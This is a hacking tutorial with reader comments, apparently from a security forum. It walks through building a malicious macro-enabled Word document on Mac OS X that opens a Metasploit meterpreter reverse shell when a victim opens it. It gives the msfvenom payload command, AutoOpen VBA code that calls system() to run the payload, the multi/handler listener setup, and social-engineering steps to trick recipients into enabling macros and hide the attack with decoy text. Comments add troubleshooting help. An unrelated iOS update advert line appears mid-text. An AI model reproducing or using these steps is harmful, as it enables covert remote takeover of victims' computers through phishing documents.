This tutorial follows the same idea as my original tutorial for windows, but I've redone it to work with Mac OS X. Here's how to get a meterpreter session from your victim opening a malicious word document:
Step 1: Creating the Payload
For this tutorial, I'll be using a python-based payload to be embedded in the word document. Here's the command to create it:
msfvenom -p python/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 > ~/Desktop/evil.py
Like usual, replace the IP address after LHOST with your machine's local IP address. You can find this by typing ifconfig.
Step 2: Adding the Payload to a Word Document
Open a blank document in word, and save it as a "Macro-Enabled Document".
Next, go to Tools --> Macro --> Macros...
Make sure your document is selected in the "Macros in:" dropdown menu rather than "All active templates and documents", and create a new macro called "AutoOpen".
After clicking "Create", replace the contents of the macro with this VBA code:
Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub AutoOpen()
system ("python -c ""INSERT_CONTENS_OF_YOUR_EVIL.PY_FILE_HERE""")
End Sub
Open your evil.py file which we generated in the first step, copy its contents, and put it into the macro. Then, save the document.
Step 3: Set Up Your Listener
Open the metasploit framework console by typing msfconsole. When it loads, tpye use multi/handler
Now, there are a few variables which you need to set: the Payload, the Lhost, and the Lport.
The Payload is python/meterpreter/reverse_tcp, and the Lhost and Lport are the same as what we used in step one. To start the listener, type exploit.
Now, when our malicious document is opened by our victim, we will get a meterpreter session.
Bonus: Social Engineering to Enable Macros
Unfortunately, when our document is downloaded from the internet (presumably through email), microsoft word provides a warning to the user about macros.
If the user chooses to disable macros, our malicious code won't run and we won't get a meterpreter session.
In order to convince the user, we'll have to be clever. First, type something like this into the document:
Now, you can add this command into the AutoOpen macro:
Dim ReplacedText As String
ReplacedText = "I do not enjoy computer jokes. Not one bit."
ActiveDocument.Range.Text = ReplacedText
Of course, instead of my terrible pun, you would use the text that the document is supposed to contain, such as an itinerary or a job application.
Now, when the document is opened without macros enabled, the user will be prompted to reopen it with macros enabled. And after they do so, they won't be suspicious because the content of the document changed.
P.S.
Sorry that I haven't posted for a while, I've been busy with school and haven't really gotten a chance to think about computer security. I hope this tutorial is useful and easy to follow, and thank you for reading!
Also, I might come back to this regarding the formatting of the replaced text, since it just gets typed with whatever format was previously used in the document.
Just updated your iPhone? You'll find new features for TV, Messages, News, and Shortcuts, as well as important bug fixes and security patches. Find out what's new and changed on your iPhone with the iOS 17.6 update.
7 Comments
hey code,nice how-to
can we do this for windows too?(from windows 7 to 10)
-D3ATH
Thanks!
Yeah for sure, check out my windows tutorial here: https://null-byte.wonderhowto.com/how-to/create-obfuscate-virus-inside-microsoft-word-document-0167780/
Hey code, I enjoyed your article.
However, it seems like Microsoft Word is refusing to run the python script. I ensured my settings were correct by just running the script, and did get a meterpreter session. I even tried to run just the python script segement of code inside of word with no luck.
Curious if you had this issue, and how you worked around it.
-Typhoon
Hi Kev,
It seems like a possibility might be that macros are disabled in your Microsoft Word settings. In Windows, this is easy to change, but in the Mac OS version this is the only option I have found: Word --> Preferences --> Security --> Uncheck "Warn before opening a file that contains macros". I'm honestly not sure if this will work, but It's the only option under "Macro Security" so it's my best guess for now.
I hope this fixes your problem,
~ Code
Hi CODE who can i see you in fb?
Can you guys please help me, I tried to do this on the new and old version of word but every time I try to compile it, it just comes up with invalid use of property. If anyone knows how to fix this please tell me.
Cant get libc.dylib working.
I changed the code because of 64bit system to:
unfortunately I get:
Microsoft Visual Basic
Error 453
Could not finde file: libc.dylib
I found the file in /usr/lib/ so it is not missing
how do I have to change the code to get it working?
I use OSX high sierra 10.13.3 and MS Word 15.34
Share Your Thoughts